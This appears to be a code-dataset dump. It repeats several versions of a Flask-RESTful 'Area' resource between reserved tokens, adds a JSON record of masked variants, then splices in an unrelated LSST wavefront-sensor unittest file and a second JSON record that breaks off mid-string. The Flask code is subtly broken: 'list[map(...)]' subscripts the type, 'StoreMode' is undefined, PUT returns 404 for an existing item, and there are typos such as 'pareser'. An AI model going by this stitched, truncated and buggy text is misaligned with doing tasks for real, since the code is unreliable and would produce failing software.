pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
<|reserved_special_token_0|>
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Area(Resource):
<|reserved_special_token_0|>
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name', type=str, required=True, help=
'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self, name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message': "Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return list[map(lambda x: x.json() for x in StoreMode.query.all())]
<|reserved_special_token_1|>
from model.area import AreaModel
from flask_restful import Resource, reqparse
from flask_jwt import jwt_required
class Area(Resource):
pareser = reqparse.RequestParser()
pareser.add_argument('name',
type = str,
required = True,
help = 'Area name is required')
@jwt_required()
def get(self, name):
area = AreaModel.search_area_byname(name)
if area:
return area.json(), 200
else:
return {'message': 'Area not found'}, 404
@jwt_required()
def put(self, name):
area = AreaModel.search_area_byname(name)
if area:
return {'message': 'Aread already exists'}, 404
else:
area = AreaModel(name)
area.save_to_db()
return area.json()
@jwt_required()
def delete(self,name):
area = AreaModel.search_area_byname(name)
if area:
area.delete()
return {'message':"Area with name '{}' deleted".format(name)}, 204
else:
return {'message': 'Wrong area name provided'}, 404
class AreaList(Resource):
@jwt_required()
def get(self):
return(list[map(lambda x: x.json() for x in StoreMode.query.all())])
|
flexible
|
{
"blob_id": "4dcc0261abdb783c60471736567faf7db8b56190",
"index": 9548,
"step-1": "<mask token>\n\n\nclass Area(Resource):\n <mask token>\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n <mask token>\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-2": "<mask token>\n\n\nclass Area(Resource):\n <mask token>\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-3": "<mask token>\n\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-4": "from model.area import AreaModel\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', type=str, required=True, help=\n 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n\n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message': \"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\n\nclass AreaList(Resource):\n\n @jwt_required()\n def get(self):\n return list[map(lambda x: x.json() for x in StoreMode.query.all())]\n",
"step-5": "from model.area import AreaModel\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nclass Area(Resource):\n pareser = reqparse.RequestParser()\n pareser.add_argument('name', \n type = str,\n required = True,\n help = 'Area name is required')\n\n @jwt_required()\n def get(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return area.json(), 200\n else:\n return {'message': 'Area not found'}, 404\n \n @jwt_required()\n def put(self, name):\n area = AreaModel.search_area_byname(name)\n if area:\n return {'message': 'Aread already exists'}, 404\n else:\n area = AreaModel(name)\n area.save_to_db()\n return area.json()\n\n @jwt_required()\n def delete(self,name):\n area = AreaModel.search_area_byname(name)\n if area:\n area.delete()\n return {'message':\"Area with name '{}' deleted\".format(name)}, 204\n else:\n return {'message': 'Wrong area name provided'}, 404\n\nclass AreaList(Resource):\n @jwt_required()\n def get(self):\n return(list[map(lambda x: x.json() for x in StoreMode.query.all())])",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
import os
import shutil
import numpy as np
import unittest
from lsst.ts.wep.Utility import FilterType, runProgram
from lsst.ts.wep.WepController import WepController
from lsst.ts.wep.ctrlIntf.RawExpData import RawExpData
from lsst.ts.aoclcSim.Utility import getModulePath
from lsst.ts.aoclcSim.WepCmpt import WepCmpt
class TestWepCmpt(unittest.TestCase):
""" Test the WepCmpt class."""
def setUp(self):
self.outputDir = os.path.join(getModulePath(), "tests", "tmp")
self._makeDir(self.outputDir)
isrDirName = "input"
isrDir = os.path.join(self.outputDir, isrDirName)
self._makeDir(isrDir)
self.wepCmpt = WepCmpt(isrDir)
# Set the survey paramters
self.wepCmpt.setFilter(FilterType.REF)
self.wepCmpt.setBoresight(0.0, 0.0)
self.wepCmpt.setRotAng(0.0)
def _makeDir(self, newDir):
os.makedirs(newDir, exist_ok=True)
def tearDown(self):
self.wepCmpt.disconnect()
shutil.rmtree(self.outputDir)
def testGetWepController(self):
wepCntlr = self.wepCmpt.getWepController()
self.assertTrue(isinstance(wepCntlr, WepController))
def testGetFilter(self):
filterType = self.wepCmpt.getFilter()
self.assertEqual(filterType, FilterType.REF)
def testSetFilter(self):
filterType = FilterType.R
self.wepCmpt.setFilter(filterType)
self.assertEqual(self.wepCmpt.getFilter(), filterType)
def testGetBoresight(self):
raInDeg, decInDeg = self.wepCmpt.getBoresight()
self.assertEqual(raInDeg, 0.0)
self.assertEqual(decInDeg, 0.0)
def testSetBoresight(self):
raInDeg = 10.0
decInDeg = 20.0
self.wepCmpt.setBoresight(raInDeg, decInDeg)
raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()
self.assertEqual(raInDegInWepCmpt, raInDeg)
self.assertEqual(decInDegInWepCmpt, decInDeg)
def testGetRotAng(self):
rotAngInDeg = self.wepCmpt.getRotAng()
self.assertEqual(rotAngInDeg, 0.0)
def testSetRotAng(self):
rotAngInDeg = 10.0
self.wepCmpt.setRotAng(rotAngInDeg)
self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)
def testIngestCalibs(self):
sensorNameList = ["R22_S11"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 6)
self.wepCmpt.ingestCalibs(fakeFlatDir)
numOfFile = self._getNumOfFileInFolder(fakeFlatDir)
self.assertEqual(numOfFile, 0)
def _makeCalibs(self, outputDir, sensorNameList):
fakeFlatDirName = "fake_flats"
fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)
self._makeDir(fakeFlatDir)
detector = " ".join(sensorNameList)
self._genFakeFlat(fakeFlatDir, detector)
return fakeFlatDir
def _genFakeFlat(self, fakeFlatDir, detector):
currWorkDir = os.getcwd()
os.chdir(fakeFlatDir)
self._makeFakeFlat(detector)
os.chdir(currWorkDir)
def _makeFakeFlat(self, detector):
command = "makeGainImages.py"
argstring = "--detector_list %s" % detector
runProgram(command, argstring=argstring)
def _getNumOfFileInFolder(self, folder):
return len([name for name in os.listdir(folder)
if os.path.isfile(os.path.join(folder, name))])
def testGetSkyFile(self):
skyFile = self.wepCmpt.getSkyFile()
self.assertEqual(skyFile, "")
def testSetSkyFile(self):
skyFile = "testSetSkyFile"
self.wepCmpt.setSkyFile(skyFile)
self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)
def testCalculateWavefrontErrorsComCam(self):
# Make the calibration products and do the ingestion
sensorNameList = ["R22_S11", "R22_S12"]
fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)
self.wepCmpt.ingestCalibs(fakeFlatDir)
# Set the skyFile
repackagedDir = os.path.join(getModulePath(), "tests", "testData",
"comcamRepackagedData")
skyFilePath = os.path.join(repackagedDir, "skyComCamInfo.txt")
self.wepCmpt.setSkyFile(skyFilePath)
# Collect the wavefront data
intraRawExpData = RawExpData()
intraObsId = 9006002
intraRawExpDir = os.path.join(repackagedDir, "intra")
intraRawExpData.append(intraObsId, 0, intraRawExpDir)
extraRawExpData = RawExpData()
extraObsId = 9006001
extraRawExpDir = os.path.join(repackagedDir, "extra")
extraRawExpData.append(extraObsId, 0, extraRawExpDir)
# Calculate the wavefront error
wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,
extraRawExpData)
self.assertEqual(len(wfErrMap), 2)
for wfErr in wfErrMap.values():
self.assertEqual(wfErr.argmax(), 1)
if __name__ == "__main__":

    # Allow running this test module directly (python <file>);
    # unittest discovers and runs all test* methods of TestWepCmpt.
    unittest.main()
|
normal
|
{
"blob_id": "6e434ff213166768a6adadf99dc5d6d8611fa2ba",
"index": 2762,
"step-1": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n <mask token>\n <mask token>\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = 
os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n <mask token>\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n <mask token>\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def 
testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestWepCmpt(unittest.TestCase):\n <mask token>\n <mask token>\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n <mask token>\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n <mask token>\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command 
= 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\n<mask token>\n",
"step-4": "import os\nimport shutil\nimport numpy as np\nimport unittest\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n self.outputDir = os.path.join(getModulePath(), 'tests', 'tmp')\n self._makeDir(self.outputDir)\n isrDirName = 'input'\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n self.wepCmpt = WepCmpt(isrDir)\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n self.assertEqual(self.wepCmpt.getRotAng(), 
rotAngInDeg)\n\n def testIngestCalibs(self):\n sensorNameList = ['R22_S11']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n fakeFlatDirName = 'fake_flats'\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n detector = ' '.join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n currWorkDir = os.getcwd()\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n command = 'makeGainImages.py'\n argstring = '--detector_list %s' % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n return len([name for name in os.listdir(folder) if os.path.isfile(\n os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, '')\n\n def testSetSkyFile(self):\n skyFile = 'testSetSkyFile'\n self.wepCmpt.setSkyFile(skyFile)\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = 
os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import os\nimport shutil\nimport numpy as np\nimport unittest\n\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\n\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n\n self.outputDir = os.path.join(getModulePath(), \"tests\", \"tmp\")\n self._makeDir(self.outputDir)\n\n isrDirName = \"input\"\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n\n self.wepCmpt = WepCmpt(isrDir)\n\n # Set the survey paramters\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n\n rotAngInDeg = 10.0\n 
